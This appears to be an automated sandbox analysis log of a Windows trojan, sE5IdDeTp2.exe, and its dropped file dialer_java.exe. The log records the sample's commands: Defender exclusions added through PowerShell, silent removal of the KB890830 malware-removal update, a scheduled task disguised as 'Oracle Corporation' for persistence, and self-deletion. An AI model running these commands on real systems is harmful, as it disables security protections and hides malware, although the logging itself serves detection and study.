Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF642721B40	97_2_00007FF642721B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF64272AD10	97_2_00007FF64272AD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF642736520	97_2_00007FF642736520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF642734440	97_2_00007FF642734440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF64272A480	97_2_00007FF64272A480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF642730160	97_2_00007FF642730160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF6427292BB	97_2_00007FF6427292BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF642730A70	97_2_00007FF642730A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF64273D0F0	97_2_00007FF64273D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF6427376E0	97_2_00007FF6427376E0

Source: C:\Windows\System32\conhost.exe	Code function: String function: 000000014000E9F0 appears 42 times
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: String function: 00007FF6099B1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF6ECFF1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF71BD51394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF7C0EF1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF642721394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF6E3A63D60 appears 48 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF75B4A1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF6E3A61394 appears 62 times

Source: sE5IdDeTp2.exe

Static PE information: invalid certificate

Source: classification engine

Classification label: mal96.troj.expl.evad.winEXE@250/60@2/2

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_03

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

File created: C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml

Jump to behavior

Source: sE5IdDeTp2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sE5IdDeTp2.exe

ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

File read: C:\Users\user\Desktop\sE5IdDeTp2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\sE5IdDeTp2.exe "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wusa.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wusa.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"	Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"	Jump to behavior
